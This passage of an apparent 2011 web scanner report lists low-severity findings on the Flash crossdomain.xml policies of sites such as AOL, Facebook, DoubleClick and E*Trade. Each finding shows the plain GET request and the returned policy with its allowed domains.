<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

6.98. http://privacy.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://privacy.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: privacy.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:16 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 419
Keep-Alive: timeout=5, max=999802
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.adsonar.com" />
<allow-access-from domain="*.advertising.com" />
<allow-access-from domain="*.tacoda.net" />
...[SNIP]...

6.99. http://pubads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 04 May 2011 03:32:36 GMT
Expires: Thu, 05 May 2011 03:32:36 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 77119
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.100. http://realestate.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://realestate.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: realestate.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:43 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_COOKIE=aid=d2da7cac76b211e0a35be5945a0c55da; path=/; domain=.aol.com; expires=Fri May 04 00:58:43 2012 GMT
Content-Type: application/xml
Content-Length: 427
Set-Cookie: userNum=58; Expires=Sat, 04-Jun-2011 00:58:43 GMT
Keep-Alive: timeout=5, max=61
Connection: Keep-Alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aolcdn.com"/>

...[SNIP]...
<allow-access-from domain="*.yourminis.com"/>
...[SNIP]...

6.101. http://redir.adsonar.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://redir.adsonar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: redir.adsonar.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:53 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=732
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.102. https://secure.opinionlab.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.opinionlab.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.opinionlab.com

Response

HTTP/1.1 200 OK
Age: 2
Date: Thu, 05 May 2011 10:54:04 GMT
Connection: Keep-Alive
Via: YouBeenCached
ETag: "d09b92e3ff85c81:2bfc"
Content-Length: 97
Content-Type: text/xml
Last-Modified: Fri, 14 Mar 2008 18:19:06 GMT
Accept-Ranges: bytes
Cool01: Opinionlab - Cool01

...<cross-domain-policy>
<allow-access-from domain="*.opinionlab.com"/>
</cross-domain-policy>

6.103. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Thu, 05 May 2011 00:57:35 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.104. http://television.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://television.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: television.aol.com

Response

HTTP/1.0 200 OK
set-cookie: dcisid=2899132428.408601165.2049507328; path=/
MIME-Version: 1.0
Date: Thu, 05 May 2011 10:54:49 GMT
Server: AOLserver/4.0.10
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 1511
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="iamalpha.com" />
<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="*.moviefone.com" />
<allow-access-from domain="*.aolhealth.com" />
<allow-access-from domain="*.walletpop.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.lightningcast.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.fanhouse.com" />
<allow-access-from domain="*platformaprojects.com" />
...[SNIP]...

6.105. https://us.etrade.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://us.etrade.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: us.etrade.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:03 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 16:10:27 GMT
ETag: "119-4cbdc2f3"
Accept-Ranges: bytes
Content-Length: 281
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.etrade.com" />
<allow-access-from domain="a248.e.akamai.net" />
<allow-access-from domain="*.etradegrp.com" />
...[SNIP]...

6.106. http://video.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://video.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: video.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:02 GMT
Server: Apache-Coyote/1.1
ETag: W/"775-1276006811000"
Last-Modified: Tue, 08 Jun 2010 14:20:11 GMT
Content-Type: application/xml;charset=utf-8
Content-Length: 775
Set-Cookie: familyfilter=1; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="cdn-startpage.aol.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="startpage.aol.com"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.aol.in"/>
<allow-access-from domain="*.aol.ca"/>
<allow-access-from domain="*.aol.tw"/>
<allow-access-from domain="*.aol.de"/>
<allow-access-from domain="*.aol.fr"/>
<allow-access-from domain="*.aol.co.uk"/>
<allow-access-from domain="*.aol.jp"/>
<allow-access-from domain="*.estage.aol.com"/>
<allow-access-from domain="*.video.aol.com"/>
<allow-access-from domain="*.channels.aol.com"/>
<allow-access-from domain="*.web.aol.com"/>
<allow-access-from domain="*.my.aol.com"/>
...[SNIP]...

6.107. http://video.foxbusiness.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://video.foxbusiness.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: video.foxbusiness.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 03 May 2011 20:43:27 GMT
Accept-Ranges: bytes
Content-Length: 944
Content-Type: application/xml
Server: Apache
ETag: "3dc006-3b0-3128d9c0"
Cache-Control: max-age=300
Date: Thu, 05 May 2011 10:56:05 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.foxbusiness.com" />
<allow-access-from domain="*.foxnews.com" />
<allow-access-from domain="*.foxsmallbusinesscenter.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.grabqa.com" />
<allow-access-from domain="*.grabtest.com" />
<allow-access-from domain="*.panachetech.com" />
<allow-access-from domain="*.projects.mediadev.edgesuite.net" />
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.dartmotif.com"/>
<allow-access-from domain="*.mediapm.edgesuite.net"/>
...[SNIP]...

6.108. http://video.google.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://video.google.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 19:35:47 GMT
Expires: Thu, 03 May 2012 19:35:47 GMT
X-Content-Type-Options: nosniff
Content-Type: text/x-cross-domain-policy
Last-Modified: Sat, 09 Apr 2011 00:14:17 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 55223

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.ytimg.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...

6.109. http://weather.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://weather.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: weather.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:17 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1214
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="cdn-startpage.aol.com"/>
<allow-access-from domain="startpage.aol.com"/>
<allow-access-from domain="*.channels.aol.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.web.aol.com"/>
<allow-access-from domain="*.my.aol.com"/>
<allow-access-from domain="*.news.aol.com"/>
<allow-access-from domain="iamalpha.com"/>
<allow-access-from domain="imakealpha.com"/>
<allow-access-from domain="aimcreate.mdat.aim.com:30100 "/>
<allow-access-from domain="*.spinner.com"/>
<allow-access-from domain="*.popeater.com"/>
<allow-access-from domain="*.theboombox.com"/>
<allow-access-from domain="*.yourminis.com"/>
<allow-access-from domain="*.opticalcortex.com"/>
<allow-access-from domain="static.stats.com"/>
<allow-access-from domain="*.stats.com"/>
...[SNIP]...

6.110. http://www.aol.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

6.111. http://www.aolnews.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.aolnews.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:19 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2128
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.digitas.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.publishing.aol.com" />

<allow-access-from domain="*.rewind.com" />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.tmz.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.video.aol.com" />
<allow-access-from domain="*.video.office.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" />

<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="publishing.aol.com" />
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="tmz.warnerbros.com" />
...[SNIP]...

6.112. http://www.apple.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.3 (Oracle)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=28
Expires: Thu, 05 May 2011 12:45:46 GMT
Date: Thu, 05 May 2011 12:45:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

6.113. http://www.blogsmithmedia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.blogsmithmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogsmithmedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 23 Dec 2010 02:59:47 GMT
Content-Type: application/xml
Cache-Control: max-age=3600
Expires: Thu, 05 May 2011 01:58:26 GMT
Date: Thu, 05 May 2011 00:58:26 GMT
Content-Length: 782
Connection: close
X-N: S

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.blogsmith.net" to-ports="*" />
   <allow-access-from domain="*.blogsmith.com" to-ports="*" />
   <allow-access-from domain="*.aolcdn.com" to-ports="*" />
   <allow-access-from domain="*.aol.com" to-ports="*" />
   <allow-access-from domain="*.*.aol.com" to-ports="*" />
   <allow-access-from domain="*.yourminis.com" to-ports="*" />
...[SNIP]...

6.114. http://www.citysbest.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.citysbest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.citysbest.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:38 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999877
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.115. http://www.dailyfinance.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 204
Keep-Alive: timeout=5, max=999968
Connection: Keep-Alive
Content-Type: text/xml; charset=utf-8

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.test.aol.com"/>
</cross-domain-pol
...[SNIP]...

6.116. http://www.dooce.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dooce.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Wed, 01 Sep 2010 16:56:47 GMT
ETag: "67b2ba4-120-48f359541d1c0"
Accept-Ranges: bytes
Content-Length: 288
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 10:56:30 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

6.117. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.76.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.118. https://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.90.127
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
